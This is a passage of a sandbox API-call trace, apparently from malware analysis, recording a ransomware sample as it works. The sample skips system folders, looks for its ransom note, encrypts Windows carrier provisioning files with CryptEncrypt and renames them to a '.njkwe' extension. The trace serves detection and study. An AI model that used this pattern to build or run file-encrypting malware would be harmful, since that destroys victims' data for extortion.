"c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\458__connections_cellular_kyivstar (ukraine)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.698] GetTickCount () returned 0x11543eb [0079.698] GetTickCount () returned 0x11543eb [0079.698] GetTickCount () returned 0x11543eb [0079.698] GetTickCount () returned 0x11543eb [0079.698] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.698] GetProcessHeap () returned 0xbe0000 [0079.698] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.698] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0079.700] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.700] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0079.700] GetProcessHeap () returned 0xbe0000 [0079.700] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.700] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.700] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.700] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.700] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.700] CloseHandle (hObject=0x43c) returned 1 [0079.700] GetProcessHeap () returned 0xbe0000 [0079.700] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.700] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0079.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\458__connections_cellular_kyivstar (ukraine)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\458__Connections_Cellular_Kyivstar (Ukraine)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\458__connections_cellular_kyivstar (ukraine)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.701] GetProcessHeap () returned 0xbe0000 [0079.701] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.701] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91096761, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91096761, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91096761, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml", cAlternateFileName="459__C~1.PRO")) returned 1 [0079.701] lstrcmpiW (lpString1="459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.701] lstrcmpiW (lpString1="459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.701] lstrcmpiW (lpString1="459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.701] lstrcmpiW (lpString1="459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.702] lstrcmpiW (lpString1="459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.702] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml") returned 162 [0079.702] StrStrIW (lpFirst="459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.702] lstrcmpW (lpString1="459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.702] lstrcmpW (lpString1="459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.702] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\459__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.702] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\459__connections_cellular_kyivstar (ukraine)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.702] GetTickCount () returned 0x11543eb [0079.702] GetTickCount () returned 0x11543eb [0079.702] GetTickCount () returned 0x11543eb [0079.702] GetTickCount () returned 0x11543eb [0079.702] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.702] GetProcessHeap () returned 0xbe0000 [0079.702] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.702] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0079.704] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.704] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0079.704] GetProcessHeap () returned 0xbe0000 [0079.704] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.704] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.704] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.704] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.704] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.705] CloseHandle (hObject=0x43c) returned 1 [0079.705] GetProcessHeap () returned 0xbe0000 [0079.705] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.705] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0079.705] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\459__connections_cellular_kyivstar (ukraine)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\459__Connections_Cellular_Kyivstar (Ukraine)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\459__connections_cellular_kyivstar (ukraine)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.705] GetProcessHeap () returned 0xbe0000 [0079.705] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.706] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9026e179, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9026e179, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9026e179, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml", cAlternateFileName="45__CO~1.PRO")) returned 1 [0079.706] lstrcmpiW (lpString1="45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.706] lstrcmpiW (lpString1="45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.706] lstrcmpiW (lpString1="45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.706] lstrcmpiW (lpString1="45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.706] lstrcmpiW (lpString1="45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.706] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml") returned 159 [0079.706] StrStrIW (lpFirst="45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.706] lstrcmpW (lpString1="45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.706] lstrcmpW (lpString1="45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.706] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\45__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.706] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\45__connections_cellular_orange (belgium)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.706] GetTickCount () returned 0x11543fb [0079.706] GetTickCount () returned 0x11543fb [0079.706] GetTickCount () returned 0x11543fb [0079.706] GetTickCount () returned 0x11543fb [0079.706] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.706] GetProcessHeap () returned 0xbe0000 [0079.706] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.706] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c7, lpOverlapped=0x0) returned 1 [0079.708] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.708] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c7, lpOverlapped=0x0) returned 1 [0079.708] GetProcessHeap () returned 0xbe0000 [0079.708] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.708] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.708] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.708] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.708] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.708] CloseHandle (hObject=0x43c) returned 1 [0079.708] GetProcessHeap () returned 0xbe0000 [0079.708] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.708] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0079.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\45__connections_cellular_orange (belgium)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\45__Connections_Cellular_ORANGE (Belgium)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\45__connections_cellular_orange (belgium)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.709] GetProcessHeap () returned 0xbe0000 [0079.709] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.709] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91096761, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91096761, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91096761, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml", cAlternateFileName="460__C~1.PRO")) returned 1 [0079.709] lstrcmpiW (lpString1="460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.709] lstrcmpiW (lpString1="460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.709] lstrcmpiW (lpString1="460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.709] lstrcmpiW (lpString1="460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.710] lstrcmpiW (lpString1="460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.710] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml") returned 162 [0079.710] StrStrIW (lpFirst="460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.710] lstrcmpW (lpString1="460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.710] lstrcmpW (lpString1="460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.710] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\460__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.710] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\460__connections_cellular_kyivstar (ukraine)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.710] GetTickCount () returned 0x11543fb [0079.710] GetTickCount () returned 0x11543fb [0079.710] GetTickCount () returned 0x11543fb [0079.710] GetTickCount () returned 0x11543fb [0079.710] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.710] GetProcessHeap () returned 0xbe0000 [0079.710] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.710] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0080.566] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.566] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0080.567] GetProcessHeap () returned 0xbe0000 [0080.567] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.567] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.567] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.567] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.567] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.567] CloseHandle (hObject=0x43c) returned 1 [0080.568] GetProcessHeap () returned 0xbe0000 [0080.568] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.568] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0080.568] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\460__connections_cellular_kyivstar (ukraine)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\460__Connections_Cellular_Kyivstar (Ukraine)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\460__connections_cellular_kyivstar (ukraine)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.571] GetProcessHeap () returned 0xbe0000 [0080.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.571] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91096761, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91096761, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91096761, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml", cAlternateFileName="461__C~1.PRO")) returned 1 [0080.571] lstrcmpiW (lpString1="461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.571] lstrcmpiW (lpString1="461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.571] lstrcmpiW (lpString1="461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.571] lstrcmpiW (lpString1="461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.571] lstrcmpiW (lpString1="461__Connections_Cellular_Kyivstar 